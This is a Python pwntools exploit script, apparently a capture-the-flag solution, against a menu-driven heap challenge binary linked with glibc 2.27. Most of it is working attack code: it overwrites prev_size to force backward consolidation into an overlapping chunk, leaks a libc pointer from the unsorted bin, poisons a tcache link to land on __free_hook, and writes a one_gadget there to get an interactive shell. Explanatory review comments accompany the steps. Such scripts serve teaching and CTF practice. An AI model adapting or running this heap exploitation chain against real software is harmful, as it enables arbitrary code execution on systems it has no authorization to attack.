| from pwn import *
# Verbose pwntools I/O tracing; every send/recv on ``r`` is echoed.
context.log_level = 'debug'

# Target binary and the switch between a local process and the lab host.
file_name = './z1r0'
debug = 0
r = remote('192.168.124.133', 9999) if debug else process(file_name)

# Symbol sources: the challenge ELF and the libc build bundled with it.
elf = ELF(file_name)
libc = ELF('./2.27/libc-2.27.so')

# Prompt string printed by the target before each menu choice.
menu = '> '
def dbg():
    """Attach gdb to the live target ``r`` (manual debugging aid; not called below)."""
    target = r
    gdb.attach(target)
def delete(index):
    """Pick menu entry 4 and answer the ``Page: `` prompt with *index*.

    Only the prompts are waited for; nothing is read back or checked.
    """
    steps = ((menu, '4'), ('Page: ', str(index)))
    for prompt, answer in steps:
        r.sendlineafter(prompt, answer)
def show(index):
    """Pick menu entry 3 and answer the ``Page: `` prompt with *index*.

    The target's output is left in the socket for the caller to parse.
    """
    steps = ((menu, '3'), ('Page: ', str(index)))
    for prompt, answer in steps:
        r.sendlineafter(prompt, answer)
def edit(index, content):
    """Pick menu entry 2, then answer the page and content prompts.

    *content* is passed through unchanged (callers hand in ``bytes``); the
    prompts themselves are ``str`` and are converted by pwntools.
    """
    steps = ((menu, '2'), ('Page: ', str(index)), ('Content: ', content))
    for prompt, answer in steps:
        r.sendlineafter(prompt, answer)
def add1(size):
    """Pick menu entry 1, sub-entry 1, and send the requested *size*.

    How the two sub-entries differ is decided by the target binary, not here.
    """
    steps = ((menu, '1'), (menu, '1'), ('size: ', str(size)))
    for prompt, answer in steps:
        r.sendlineafter(prompt, answer)
def add2(size):
    """Pick menu entry 1, sub-entry 2, and send the requested *size*.

    Same shape as ``add1``; only the sub-entry differs.
    """
    steps = ((menu, '1'), (menu, '2'), ('size: ', str(size)))
    for prompt, answer in steps:
        r.sendlineafter(prompt, answer)
# ---------------------------------------------------------------------------
# Exploit sequence.  The remarks about which chunk each slot maps to are the
# reviewer's reading of the sizes and indices used below; the binary's own
# allocation and slot-numbering rules are not visible in this file.
# NOTE(review): the sequence depends on glibc 2.27 behaviour (the bundled
# ./2.27 library): a writable __free_hook, and a tcache that has neither the
# double-free key check (2.29+) nor safe-linking (2.32+).  The hooks were
# removed in 2.34, so it is tied to that exact library version.
# ---------------------------------------------------------------------------

# Allocate: seven 0xf0 requests (slots 0..6), one more 0xf0 (slot 7) and two
# 0x178 requests (slots 8 and 9).  Slot numbering assumes slots are handed
# out in order — TODO confirm against the binary.
for i in range(7):
    add1(0xf0)
add1(0xf0)
add2(0x178)
add2(0x178)

# Free slots 1..7: seven frees of one size fill that tcache bin, so the next
# free of the same size (slot 0, below) takes the unsorted-bin path.
for i in range(7):
    delete(i + 1)

# Write 0x178 bytes into slot 8; the final qword (0x980) lands just past the
# chunk, i.e. presumably in slot 9's prev_size field.
# NOTE(review): for the later delete(9) to consolidate backwards, slot 9's
# size/PREV_INUSE must also be altered; nothing in this file shows how
# (likely an extra byte written by the binary's edit) — verify with dbg().
p1 = b'a' * 0x170 + p64(0x980)
edit(8, p1)

# Inside slot 9, plant a fake chunk header (prev_size 0, size 0x81) at
# offsets 0xf0/0xf8, apparently to satisfy free()'s next-chunk sanity checks.
p2 = b'a' * 0xf0 + p64(0) + p64(0x81)
edit(9, p2)

# Slot 0 -> unsorted bin (its tcache bin is full); freeing slot 9 then seems
# to merge backwards across the 0x980 range, leaving one large free chunk
# that overlaps slots 0..8.
delete(0)
delete(9)

# Drain the seven tcache entries so the following requests are served from
# the overlapping free chunk.
for i in range(7):
    add1(0xf0)

# Two more requests are carved from that chunk; show(9) then prints memory
# that presumably still holds a stale arena pointer from the bin list.
add1(0xf0)
add1(0xf0)
show(9)

# Leak parsing: read up to the 0x7f byte and take the last 6 bytes as a
# little-endian pointer.  '- 96 - 0x10' is the usual unsorted-bin-head ->
# __malloc_hook distance for this libc layout — hedged; check against
# libc.sym if the leak looks wrong.
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10
success('malloc_hook = ' + hex(malloc_hook))
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
success('free_hook = ' + hex(free_hook))

# Gadget offsets specific to this exact libc build; index 1 is used and its
# register/stack preconditions are not checked here.
one = [0x4f3d5, 0x4f432, 0x10a41c]
one_gadget = libc_base + one[1]

# Free a slot that (per the layout above) shares memory with slot 9, then
# overwrite the freed chunk's tcache link through slot 9 so the second of
# the next two allocations is handed __free_hook.
delete(6)
p3 = p64(free_hook)
edit(9, p3)
add1(0xf0)
add1(0xf0)

# Slot 10 is assumed to be the allocation that landed on __free_hook; the
# following free() of slot 0 then calls the gadget.
p4 = p64(one_gadget)
edit(10, p4)
delete(0)

r.interactive()